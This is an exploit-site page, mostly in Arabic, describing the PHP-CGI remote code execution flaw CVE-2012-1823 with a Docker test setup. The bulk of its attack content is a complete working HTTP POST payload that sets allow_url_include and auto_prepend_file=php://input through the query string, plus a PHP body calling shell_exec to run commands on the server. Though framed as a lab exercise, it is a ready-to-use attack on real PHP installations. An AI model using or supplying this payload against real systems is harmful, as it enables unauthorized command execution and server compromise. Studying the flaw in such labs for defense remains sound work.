Sploitus

Exploit for PHP_CVE-2012-1823

kitploit · 2026-08-25

Exploit Code

MARKDOWN38 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBERHARSH-PHP_CVE-2012-1823
# ثغرة تنفيذ الأوامر عن بُعد في PHP-CGI (CVE-2012-1823)

## المبدأ

  * مقالة مرجعية: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
  * الإصدارات المتأثرة: php < 5.3.12 أو php < 5.4.2



## بيئة الاختبار

بناء وتشغيل البيئة:

root@kitploit:~
    
    
    docker-compose build
    docker-compose up -d
    

بعد تشغيل البيئة، قم بزيارة `http://your-ip:8080/` لرؤية نص "Hello".

عند زيارة `http://your-ip:8080/index.php?-s` سيتم عرض شفرة المصدر، مما يدل على وجود الثغرة. أرسل حزمة البيانات التالية، ستلاحظ تنفيذ الكود الموجود في الجسم:

root@kitploit:~
    
    
    POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: example.com
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 31
    
    <?php echo shell_exec("id"); ?>